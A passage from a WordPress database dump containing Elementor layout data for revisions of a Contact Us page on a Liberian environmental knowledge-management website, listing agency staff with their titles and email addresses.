href=\\\"mailto:Kamara.ed14@gmail.com\\\">Kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong>\\nConservation Manager, FDA\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamag@gmail.com <\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14772,2343,'_elementor_edit_mode','builder'),(14773,2343,'_elementor_template_type','wp-page'),(14774,2343,'_elementor_version','2.7.5'),(14775,2343,'_wp_page_template','default'),(14776,2343,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\n\\nGIS Coordinator<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong><br>\\n\\nCoordinator Climate Change Secretariat<br>\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:Kamara.ed14@gmail.com\\\">Kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamag@gmail.com <\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14778,2344,'_elementor_edit_mode','builder'),(14779,2344,'_elementor_template_type','wp-page'),(14780,2344,'_elementor_version','2.7.5'),(14781,2344,'_wp_page_template','default'),(14782,2344,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><\\/p><p>GIS Coordinator<\\/p><p>UNCCD Focal Point<\\/p><p><a 